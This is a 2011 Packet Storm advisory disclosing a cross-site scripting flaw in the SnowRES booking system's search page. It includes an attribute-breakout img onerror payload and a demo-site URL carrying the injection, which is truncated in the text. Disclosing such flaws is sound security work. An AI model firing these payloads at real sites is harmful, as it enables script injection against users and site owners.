SnowRES - Accommodation Booking System Cross Site Scripting

2011-08-23T00:00:00
ID PACKETSTORM:104359
Type packetstorm
Reporter Eyup CELIK
Modified 2011-08-23T00:00:00

Description

                                        
                                            `# Exploit Title: SnowRES - Accommodation Booking System Stored XSS  
# Date: 2011  
# Author: Eyup CELIK  
# Version: All Version  
# Tested on: All versions are Vulnerability  
  
ISSUE  
  
Cross Site Scripting can be done using the command input  
  
Vulnerable Page:  
advanced_search_result.php (Search Modules)  
  
Exploit:  
"/></a></><img src=1.gif onerror=alert(1)>  
  
Demo:  
http://demo.snowtech.com.au/snowres/advanced_search_result.php?keywords="%2F><%2Fa><%2F><img+src%3D1.gif+onerr&search_in_description=1&inc_subcat=1&osCsid=e63dcb5908d8aab2c6bdf4ee0d283485&x=10&y=6  
  
  
Thanks,  
  
  
Eyup CELIK  
Bilgi Teknolojileri Güvenlik Uzmani  
http://www.eyupcelik.com.tr  
`